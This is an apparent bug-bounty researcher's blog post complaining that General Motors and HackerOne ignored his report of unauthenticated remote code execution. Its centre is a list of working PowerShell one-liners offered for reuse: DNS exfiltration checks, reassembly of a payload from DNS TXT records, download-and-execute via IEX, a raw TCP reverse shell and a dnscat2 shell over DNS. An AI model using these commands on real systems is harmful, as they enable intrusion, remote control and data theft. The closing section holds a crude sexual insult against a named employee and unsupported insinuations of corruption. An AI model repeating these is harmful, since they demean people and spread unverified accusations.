TL;DR

A key player in the global auto/finance industry prefers ignorance over diligence while, one of the top Bug-Bounty program watches idly.

Background

Roughly 90 days (sufficient time for coordinated disclosure) ago, I endured the submission process of the well-funded, fraudulent mock-up, HackerOne to identify several RCE (Remote Code Execution) via Java deserialization exploits available for UN-authenticated SYSTEM level compromise to the General Motors Incident Response team.

What follows is a lesson for the reader: "How to Bounty Fail"

I requested the report be made public for others to learn from in the hopes that end-users are better able to understand the flaws and their consequences but, said request has been ignored. Because GM and HackerOne refused to cooperate even according to their own terms; I was left with few options other than copying and pasting the full report externally. Thus for the practitioners, students and curious readers, the full report can be found here. @ 899, I copy/pasted the wrong IPs into the report; there were responses from Canadian based Cloud provider nodes ☆:.｡.o(≧▽≦)o.｡.:☆ meaning, I saw evidence of someone performing positive validation using the provided PoC. I welcome any and all critique of the report as, clearly I have no idea what I'm doing.

Useful Tools:

https://github.com/PowerShell/PowerShell
https://github.com/breenmachine/dnsftp
https://github.com/iagox86/dnscat2
https://github.com/lukebaggett/dnscat2-powershell
https://github.com/EmpireProject/Empire

Powershell One-Liners

In an effort to avoid this occurrence in the future for myself as well as others, here's some one-liners to help confirm impact. Most of these ought be able to be combined for a chained one-liner "one shot, one kill" kind of thing should you so desire.

RCE + ExFil Confirmation:

powershell.exe -c "& {nslookup longrandomstring.burpcollaborator.net}"

powershell.exe -c "& {nslookup yourexampledomain.com}"

powershell.exe -c "& {[Net.DNS]::GetHostEntry('yourexampledomain.com')}"

Write File:

powershell.exe -Command "& {Set-Content -Value 'your_text_goes_here' -Path C:\Users\user\Desktop\your_evil_file.txt}"; "& {Add-Content -Value 'more_text_goes_here' -Path C:\Users\user\Desktop\your_evil_file.txt}"; "& {Add-Content -Value 'moar_text_goes_here' -Path C:\Users\user\Desktop\your_evil_file.txt}"

cmd /C echo Param([String]$s)$error.clear();$p="";for($i=0;$i -ge 0;$i++){$c=[string](Invoke-Expression "cmd.exe /C nslookup -type=TXT $($i).$($s)");if($error.Count -ge 1){$i=-10;}$f=$c.IndexOf('"')+1;$l=$c.LastIndexOf('"')-$f;$p+=$c.Substring($f,$l);}$o=[Convert]::FromBase64String($p);[IO.File]::WriteAllBytes('C:\Users\user\Desktop\base',$o) > C:\Users\user\Desktop\get_evil.ps1

Launch Process:

powershell.exe -Command "& {Start-Process 'C:\windows\system32\notepad.exe'}"

powershell.exe -Command "& {type C:\Users\user\Desktop\your_evil_file.txt | msg *}"

Download File via DNS:

powershell.exe -Command "cd 'C:\Users\user\Desktop'; IEX (New-Object Net.Webclient).DownloadString('C:\Users\user\Desktop\get_evil.ps1')

Reverse Shell:

powershell.exe -Command "& {$sm=(New-Object Net.Sockets.TCPClient('192.168.1.1',9999)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}}"

Reverse Shell over DNS:

powershell.exe -Command "IEX (New-Object Net.Webclient).DownloadString('C:\Users\user\Desktop\dnscat2.ps1'); Start-Dnscat2 -DNSServer 192.168.1.1 -Domain yourexampledomain.com -PreSharedSecret your_long_string_for_encryption -ExecPS"

Teh Fail

GM failed to sniff packets nor perform process monitoring (primary building blocks for ANY digital defense professional) in order to validate the PoCs provided which documented the vulnerability, exploit and impact of the discovered UN-authenticated SYSTEM level RCE(s). Since they asked so nicely for them, here they are …

t3h v!d3Q$ 4 z h0|1d4y p/\r7y!

Intro:

More Intro:

Fun Stuff:

DNS Stuff:

Irrelevant Commentary:

I totally failed with my first/last submission, I didn't “try harder” simply for aversion of entrapment to a lawsuit (some of these shells hang depending on conditions) and wasn't interested in being involved in any breach scenario should one of the shells escape control. “Cool story bro, stolen data or it didn't happen” kinda thing I guess?

Why do I think this was ignored? Oh, I don't know …

Could it be that the SecOps team are currently employed by HPEe?

¯\(ツ)/¯

Could it be that the GM's Deputy CISO was recently employed by HPEe?

¯\(ツ)/¯

Could it be that the current H1 CEO was recently a VP at HPEe?

¯\(ツ)/¯

Could it be that a Chairwoman of the HPEe board of directors also sits on the GM board of directors?

¯\(ツ)/¯

@ H1

Like a body-builder on 'roids with your VC funding, those “we hit harder” muscles you're flexing are just as fraudulent; file for bankruptcy sooner than later.

@ HPEe

Keep producing/delivering fraudulent solutions which you don't even validate with a certain flagship product (Fortify), hackers everywhere thank you.
P.S. - Isn't “The Wolf” on your team?

@ GM “SecOps”

Submit your applications to teh Geek Squad ASAP!

@ “Cubo”

Go back to ISC2, SANS or whatever shitty outfit that told you you were qualified and blow someone, maybe you'll learn “something”.

@ hackers

Don't waste your time. Or, do? You've been briefed.